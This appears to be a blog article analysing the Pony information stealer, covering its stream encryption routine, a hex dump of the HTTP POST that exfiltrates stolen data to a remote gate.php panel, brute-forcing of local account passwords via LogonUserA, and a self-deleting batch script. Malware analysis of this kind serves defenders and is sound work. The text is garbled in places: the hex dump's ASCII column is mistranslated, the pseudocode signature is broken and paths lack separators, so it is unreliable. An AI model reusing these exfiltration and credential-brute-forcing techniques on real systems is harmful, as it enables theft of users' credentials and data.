A Case Study of Information Stealers 2023
In this article we will learn about A Case Study of Information Stealers.
Introduction [A Case Study of Information Stealers]
In this third and final installment of the Pony Stealer series, we’ll pick up where we left off last time: the encryption algorithm. After that, we’ll look at how Pony sends encrypted information to the server, and then finish the cleanup work that the malware does.
Encrypt stolen data:
Using the buffer created in the decompiled function we saw in the second part, the stream is encrypted by calling the following function:
/pseudo code/
UNCRYPT (UCHAR* key but UCHAR* data, int datalen)
{
int ibuf = 0;
for(i=0;i<datalen;i++)
{
ibuf++;
ebp_1 = keybuf[ibuf];
ebp_4 += ebp_1;
ebp_2 = keybuf[ebp_4];
keybuf[ebp_3] = ebp_2;
keybuf[ebp_4] = ebp_1;
data[i] ^= keybuf[ebp_1+ebp_2];
}
}
After receiving the data, the server can easily decrypt it by calling the same two functions. Now after encrypting the stream, its header is set to CRYPTED0.
Then the stream data is re-encrypted using the same method we just saw.
Submitting stolen information:
At this stage, the stolen information is ready to be sent to the server. The information is sent to domain_name/panel/gateway.php in a POST request, and then the online service apparently decrypts the data and displays it to the attacker.
Here is the hex dump of the request that is sent to the server:
0029EED8 50 4F 53 54|20 2F 53 75|72 65 2F 70|61 6E 65 6C| POST /Sure/panel
0029EEE8 2F 2F 67 61|74 65 2E 70|68 70 20 48|54 54 50 2F| //gate.php HTTP/
0029EEF8 31 2E 30 0D|0A 48 6F 73|74 3A 20 68|65 72 69 74| 1.0
Host: Heir
0029EF08 61 67 65 69|62 6E 2E 63|6F 6D 0D 0A|41 63 63 65| ageibn.com
Access
0029EF18 70 74 3A 20|2A 2F 2A 0D|0A 41 63 63|65 70 74 2D| point: /
Accept-
0029EF28 45 6E 63 6F|64 69 6E 67|3A 20 69 64|65 6E 74 69| Coding: identi
0029EF38 74 79 2C 20|2A 3B 71 3D|30 0D 0A 41|63 63 65 70| you, *;q=0
Accept
0029EF48 74 2D 4C 61|6E 67 75 61|67 65 3A 20|65 6E 2D 55| t-Language: en-U
0029EF58 53 0D 0A 43|6F 6E 74 65|6E 74 2D 4C|65 6E 67 74| WITH
Content-Lengt
0029EF68 68 3A 20 31|38 30 0D 0A|43 6F 6E 74|65 6E 74 2D| h: 180
Content-
0029EF78 54 79 70 65|3A 20 61 70|70 6C 69 63|61 74 69 6F| Type: application
0029EF88 6E 2F 6F 63|74 65 74 2D|73 74 72 65|61 6D 0D 0A| n/octet-stream
0029EF98 43 6F 6E 6E|65 63 74 69|6F 6E 3A 20|63 6C 6F 73| Connection: open
0029EFA8 65 0D 0A 43|6F 6E 74 65|6E 74 2D 45|6E 63 6F 64| E
Content-Encod
0029EFB8 69 6E 67 3A|20 62 69 6E|61 72 79 0D|0A 55 73 65| ing: binary
Use
0029EFC8 72 2D 41 67|65 6E 74 3A|20 4D 6F 7A|69 6C 6C 61| r-Agent: Mozilla
0029EFD8 2F 34 2E 30|20 28 63 6F|6D 70 61 74|69 62 6C 65| /4.0 (compatible
0029EFE8 3B 20 4D 53|49 45 20 37|2E 30 3B 20|57 69 6E 64| ; MSIE 7.0; Wind
0029EFF8 6F 77 73 20|4E 54 20 36|2E 31 3B 20|54 72 69 64| Windows NT 6.1; Trid
0029F008 65 6E 74 2F|34 2E 30 3B|20 53 4C 43|43 32 3B 20| ent/4.0; SLCC2;
0029F018 2E 4E 45 54|20 43 4C 52|20 32 2E 30|2E 35 30 37| .NET CLR 2.0.507
0029F028 32 37 3B 20|2E 4E 45 54|20 43 4C 52|20 33 2E 35| 27; .NET CLR 3.5
0029F038 2E 33 30 37|32 39 3B 20|2E 4E 45 54|20 43 4C 52| 0.30729; .NET CLR
0029F048 20 33 2E 30|2E 33 30 37|32 39 3B 20|4D 65 64 69| 3.0.30729; Med
0029F058 61 20 43 65|6E 74 65 72|20 50 43 20|36 2E 30 29| central PC 6.0)
0029F068 0D 0A 0D 0A|00
After successfully sending the header, Pony sends the encrypted stolen data to the server. And finally, the stream holding the encrypted data is released.
Stealing local computer credentials:
It is not clear why the malware authors decided to perform this task on their own. They could have included the function responsible for stealing local computer account credentials in the callback table, thus communicating with the server only once. Instead, they decided to do it afterwards and re-compress, encrypt and then send each account’s credentials separately.
Pony starts by modifying the permission token by adding the following permissions:
- SeImpersonatePrivilege
- SeTcbPrivilege
- SeChangeNotifyPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeIncreaseQuotaPrivilege
- SeAssignPrimaryTokenPrivilege
These permissions are added to the token one at a time:
- Call LookupPrivilegeValueA to look up the privilege LUID.
- Calling OpenProcessToken with TOKEN_ADJUST_PRIVILEGES for the current process.
- Calling AdjustTokenPrivileges to finally add the privilege to the process token.
- The token must be modified in order for the current thread to impersonate another user’s account.
The next step is to load all the users (usernames) on the machine; this is done by calling the NetUserEnum API ( In my case the users were: “Administrator” and “Guest”). Subsequently, Pony will start bruteforcing, using a list of words, passwords to accounts. This process is described below:
- In my case, the demo starts by first brute forcing the password for the Guest account.
- First, it tries to login without a password using the LogonUserA API.
- If the last step fails, it provides the username in lowercase as the password to the same API.
- If the previous attempt failed, Pony will use the word list (stored at 00417F27) that was deciphered in memory before it even started stealing information (see the first part of this series). The sample loops through each word and provides it as a password for the LogonUserA API.
- If the call to LogonUserA was successful, it means that the password is correct. The thief encrypts the username and password in the same way as before and then sends them to the server.
Now, whether the call to LogonUserA succeeded or failed, the sample moves to the next account and repeats the same steps.
Self-destruction:
The last function is called (004108C9) and its purpose is to remove malware from the disk. Automatic deletion is performed as follows:
- A random .bat file will be generated. eg: 72022703.bat
- The full path to the sample executable is found using the GetModuleFileName API.
- The function then gets the path to the Temp folder using the GetTempPathA API. eg: C:UsersmeAppDataLocalTemp
It then writes the following batch script to the file:
:who - del %1
- if %1 exists goto ktk
- del %0
- Load shell32.dll, GetProcAddress to get the address of ShellExecuteA, then call it with the following arguments.
Subsequently, shell32.dll is loaded and GetProcAddress is used to get the ShellExecuteA API address. The API is then called as follows:
ShellExecuteA(NULL,”open”,”C:UsersSONYAppDataLocalTemp72022703.bat”,”C:UsersmeDesktoppony.exe”,NULL,NULL);
As you can see, the path to the malware executable is passed to the batch script as an argument, and the script simply deletes it. The computer is now clean again, except that the user’s information was stolen.
Related article:The Hacker Methodology 2023
Conclusion:
In this series, we took an in-depth look at Pony Information Stealer and demystified how it steals personal information, encrypts it, and then sends it to a remote server. However, there is no reason to generalize that this is how every information thief works. As the name of this series suggests; this analysis is not just an example of information thieves we can find “out there”.
